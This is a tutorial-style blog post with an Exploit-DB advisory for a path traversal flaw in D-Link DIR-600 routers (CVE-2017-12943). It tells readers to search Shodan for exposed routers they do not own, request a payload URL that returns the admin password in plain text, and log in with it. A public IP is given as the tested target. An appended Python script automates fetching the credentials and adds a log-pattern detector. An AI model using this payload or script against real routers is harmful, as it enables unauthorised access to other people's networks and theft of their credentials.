Jithin D Kurup
Information Security Consultant
jithindkurup · 8 years ago
D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
Hello All,
In this tutorial I will explain how to obtain the username and password of a D-Link DIR-600 router through an absolute path traversal attack.
Type: Webapps
Platform: Hardware
Choose any vulnerable router (hardware revision B1, firmware 2.01). You can browse www.shodan.io to find devices exposed online (register and log in to a Shodan account to unlock the advanced search features).
Search for "D-Link DIR-600".
Pick a router and proceed to its login page.
The attack is simple: it requires no tools other than your browser and a quick copy-and-paste. The attacker only has to request the following path to obtain the user's credentials: model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
e.g. http://targetIP:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
Once you have selected a target device, you're good to go.
The login credentials are displayed in plain text. Next, use the login ID and password to access the router.
To exploit a router over the Internet, the target must have remote access (WAN-side management) enabled; otherwise the request only works from the LAN. The password file must also exist at the expected path, /var/etc/httpasswd.
Fix & Countermeasure:
Turn off the router's remote access feature if you are not using it. Upgrade your router firmware.
The video PoC and the Exploit-DB write-up follow below :)
# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact: https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor: www.dlink.com
# Version: Hardware version: B1
# Firmware version: 2.01
# Tested on: All Platforms
1) Description
Once connected to a D-Link DIR-600 router (firmware version 2.01), any user can bypass the router's admin panel login simply by adding a short payload to the URL.
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
It is more dangerous when the router has a public IP with remote login enabled.
In my case, the tested router IP was: http://190.164.170.249
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
2) Proof of Concept
Step 1: Go to the router login page: http://190.164.170.249:8080
Step 2: Append the payload to the URL.
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
Bingo, the admin credentials are returned in plain text. Log in with them and you have admin access to the router: you can download/upload settings, change settings, etc.
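As an added example (not part of the original post or the Exploit-DB entry), the Python script below automates the two steps above for authorised testing of your own device and adds the defender's side: a detector that flags the same REQUIRE_FILE request pattern in web-server access logs, including the directory-climbing and double-encoded variants a scanner might try. The endpoint path and parameter name come from the advisory; the target host and port, the combined-log format and the sample log lines are constructed assumptions for illustration, not the router's own log format.

```python
"""Added example (not from the original post): PoC URL builder/fetcher for the
D-Link DIR-600 REQUIRE_FILE absolute path traversal (CVE-2017-12943) and a
log-side detector for the same request pattern.

Assumptions (not from the advisory): the router answers on the port in
`base_url`; the file body is echoed verbatim; SAMPLE_LOG is a constructed
Apache/nginx-style combined access log, not the device's own log format.
"""
import re
import sys
from typing import List, Optional, Tuple
from urllib.error import URLError
from urllib.parse import parse_qs, quote, unquote, urlsplit
from urllib.request import Request, urlopen

VULN_PATH = "/model/__show_info.php"       # endpoint named in the advisory
PARAM = "REQUIRE_FILE"                      # parameter named in the advisory
DEFAULT_TARGET_FILE = "/var/etc/httpasswd"  # credentials file named in the advisory


def build_poc_url(base_url: str, target_file: str = DEFAULT_TARGET_FILE) -> str:
    """Build the PoC URL, percent-encoding the path exactly as the advisory's
    payload does (/var/etc/httpasswd -> %2Fvar%2Fetc%2Fhttpasswd)."""
    return f"{base_url.rstrip('/')}{VULN_PATH}?{PARAM}={quote(target_file, safe='')}"


def fetch_file(base_url: str, target_file: str = DEFAULT_TARGET_FILE,
               timeout: float = 5.0) -> Optional[str]:
    """Request `target_file` through the vulnerable endpoint and return the
    response body, or None on any network/HTTP error. Only run this against
    devices you own or are authorised to test."""
    req = Request(build_poc_url(base_url, target_file),
                  headers={"User-Agent": "dir600-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except (URLError, OSError):
        return None


# Apache/nginx combined-log prefix: client IP, identd, user, [time], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def find_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client_ip, decoded_file, status) for every request to the
    vulnerable endpoint whose REQUIRE_FILE is an absolute path or climbs
    directories. The value is decoded twice so %252F-style double encoding
    (a common filter-evasion trick) is still caught."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip
        parts = urlsplit(m.group("target"))
        if parts.path != VULN_PATH:
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            decoded = unquote(raw)  # parse_qs already decoded once; this handles double-encoding
            if decoded.startswith("/") or ".." in decoded:
                hits.append((m.group("ip"), decoded, int(m.group("status"))))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Aug/2017:10:15:01 +0000] "GET /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd HTTP/1.1" 200 48',
    '198.51.100.2 - - [29/Aug/2017:10:15:05 +0000] "GET /login.php HTTP/1.1" 200 1024',
    '203.0.113.7 - - [29/Aug/2017:10:16:12 +0000] "GET /model/__show_info.php?REQUIRE_FILE=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 512',
    '192.0.2.9 - - [29/Aug/2017:10:17:00 +0000] "GET /model/__show_info.php?REQUIRE_FILE=%252Fvar%252Fetc%252Fhttpasswd HTTP/1.1" 200 48',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python dir600_check.py http://192.0.2.1:8080  (authorised targets only)
        body = fetch_file(sys.argv[1])
        print("no response / request failed" if body is None else body)
    else:
        for ip, path, status in find_traversal_requests(SAMPLE_LOG):
            print(f"traversal attempt from {ip}: {PARAM}={path} (HTTP {status})")
```

Run it with a base URL to fetch the credentials file from a device you are authorised to test, or with no arguments to see the detector flag three of the four constructed log lines (the plain absolute path, the `../` climb and the double-encoded variant) while leaving the ordinary login request alone.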
Credits go to: tytusromekiatomek